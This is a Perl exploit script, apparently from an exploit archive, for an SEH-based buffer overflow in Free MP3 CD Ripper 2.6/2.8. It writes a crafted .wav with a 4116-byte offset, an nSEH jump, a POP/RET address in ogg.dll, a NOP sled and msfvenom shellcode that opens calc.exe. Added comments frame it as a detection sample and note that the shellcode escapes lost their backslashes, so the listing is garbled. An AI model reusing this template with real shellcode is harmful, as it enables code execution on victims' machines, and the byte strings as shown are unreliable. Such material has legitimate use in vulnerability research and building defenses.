
Free MP3 CD Ripper 2.6 / 2.8 Buffer Overflow

Posted on 24 April 2015

#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attempting a vanilla buffer overflow
# in fact it is an SEH based exploit
# using the address 0x7C9D30D7 limits the targets
# which I assume belongs to an OS file; it didn't work on win7
# yes he did find a buffer overflow since the offset reaches ESP before SEH
# in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
# This p0c > win 7s & 8s
# ThreatActor at CoreRed.com
##
#
# What this script does: it writes a single file, $file, whose contents are
# $buff . $nseh . $seh . $nop . $shell -- a fixed-size filler followed by the
# SEH-overwrite payload described in the comments below.  From a defender's
# point of view the resulting .wav is a useful regression/detection sample:
# a file of this exact size and byte pattern (4116 'A's followed by the
# trailer) should be rejected by a fixed build and is trivial to signature.
#
# Code-quality notes (the script predates any strictures):
#   * No `use strict; use warnings;`, so $FILE below is an undeclared
#     package global rather than a lexical filehandle.
#   * The `open` is the two-argument form with the filename interpolated
#     into the mode string, and its return value is not checked; if the
#     open fails, the `print` silently writes to an unopened handle.
#   * The string literals as shown here appear to have lost their
#     backslashes in page extraction ("x90" rather than the escape form),
#     so the listing is not byte-faithful to the original -- treat it as
#     documentation of the layout, not as a runnable artefact.

my $file = "p0c.wav";            # output path; relative to the cwd
my $buff = "A" x 4116;           # offset to SEH
my $nseh = "xebx06xffxff";       # dat 8 jmp (the nSEH slot, per the author)
my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll (little-endian, via pack 'V')
my $nop = "x90" x 28;            # 28-byte pad before the payload
# msfvenom -p windows/exec CMD=calc.exe -f perl -b 'x00xffx0ax0d'
# Payload generated by the msfvenom line above; it only launches calc.exe.
my $shell = "xdaxcdxd9x74x24xf4xb8x50x99x22x39x5bx33xc9" .
"xb1x31x31x43x18x83xc3x04x03x43x44x7bxd7xc5" .
"x8cxf9x18x36x4cx9ex91xd3x7dx9exc6x90x2dx2e" .
"x8cxf5xc1xc5xc0xedx52xabxccx02xd3x06x2bx2c" .
"xe4x3bx0fx2fx66x46x5cx8fx57x89x91xcex90xf4" .
"x58x82x49x72xcex33xfexcexd3xb8x4cxdex53x5c" .
"x04xe1x72xf3x1fxb8x54xf5xccxb0xdcxedx11xfc" .
"x97x86xe1x8ax29x4fx38x72x85xaexf5x81xd7xf7" .
"x31x7axa2x01x42x07xb5xd5x39xd3x30xcex99x90" .
"xe3x2ax18x74x75xb8x16x31xf1xe6x3axc4xd6x9c" .
"x46x4dxd9x72xcfx15xfex56x94xcex9fxcfx70xa0" .
"xa0x10xdbx1dx05x5axf1x4ax34x01x9fx8dxcax3f" .
"xedx8exd4x3fx41xe7xe5xb4x0ex70xfax1ex6bx8e" .
"xb0x03xddx07x1dxd6x5cx4ax9ex0cxa2x73x1dxa5" .
"x5ax80x3dxccx5fxccxf9x3cx2dx5dx6cx43x82x5e" .
"xa5x20x45xcdx25x89xe0x75xcfxd5";
# Two-arg open, no error check, bareword-style global handle -- see notes above.
open($FILE,">$file");
# The file is the plain concatenation of the five parts, in this order.
print $FILE $buff.$nseh.$seh.$nop.$shell;
# close() result is also unchecked; a buffered write error would go unnoticed.
close($FILE);
print "+++++++++++++++++++ ";

 
